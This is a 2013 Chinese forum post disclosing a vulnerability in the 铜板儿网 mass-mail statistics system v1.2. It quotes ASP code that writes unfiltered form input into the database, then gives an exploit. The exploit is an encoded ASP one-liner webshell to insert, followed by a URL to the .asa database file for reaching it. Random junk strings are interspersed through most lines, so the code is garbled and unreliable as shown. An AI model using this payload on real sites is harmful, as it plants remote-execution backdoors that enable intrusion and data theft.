找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2034|回复: 0
打印 上一主题 下一主题

铜板儿网邮件群发统计系统 v1.2 漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2013-3-14 20:14:57 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
'Fenlei.asp
( h" y/ v2 B. J" K+ j
' h+ T3 ]* E& I2 U3 t% {: ~IF Request.QueryString("Action")="del" Then
$ x- U5 @* I/ b6 ~7 E- }7 DID=Request.QueryString("ID")
! \/ B1 i- R7 LIF Countss ("tui","Fenlei",ID )<>0 then
& d' {7 O8 z2 Z0 v4 ?# X+ `'略 4 t9 H. \: m& v" v' K( `
IF Request.QueryString("Action")="Add" Then
1 J' t1 {7 A2 }6 A4 }) b* QTname=Request.Form("Typename") / c. f7 F9 g8 k' O. B
Set Rs=Server.CreateObject("adodb.Recordset") # G5 M6 v( W: T1 n- {+ {! a
Sql="Select * From Fenlei Order by id Desc "
3 X/ |0 _: ?. m( C& @/ S' M0 ^3 P) LRs.Open Sql,Conn,1,3 ' c) D8 I- l/ ?3 Q
Rs.Addnew
% `: u- g: x) u# m/ Z+ G. lRs("Typename")=Tname   b1 c& C9 {7 {, B: W- G
'略 , B* U. ]7 H% M. L3 g# S7 w% O# J  h( y
Set Rs=Server.CreateObject("adodb.Recordset") 9 [8 W7 j' @* I) X3 C
Sql="Select * From Fenlei Order by id Desc " 6 q" E* a: d$ F' s7 n
Rs.Open Sql,Conn,1,1 1 D( X8 [: u$ j/ @/ G- W' Y) Y1 J
'略 ! N9 ?! o& C/ S. E
%>
3 u6 w; d! i$ |% ~) `
7 r& l) l* S8 `- |8 n' s, G9 f/ y+ ~ $ c! B9 k5 {# Y0 a8 G* K# J2 N

3 w" i& S" y3 o没有过滤,直接写入数据库。" O, r$ w5 B' I! F7 m

' ^* A" M+ h5 b5 z, p& Z利用方法:' l/ W& r/ K$ D; {
8 k  v; b( J) c) |8 i0 l' |; |& a
插入:┼攠數畣整爠煥敵瑳∨≡┩>
6 Y5 \. f+ s0 h6 N1 o. I2 E
- C2 z. X; Q9 N' ^; U9 I/ R
4 |; n- p& a! F连接: http://www.xxx.com/###tongbaner.asa * ~- Y4 ]  N2 a9 }* W7 e
'默认安装文件:
- @* {8 a! `/ ]  a9 P0 E  G'install.asp
6 X+ S' T8 t3 ]8 i1 O, k. F( v
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表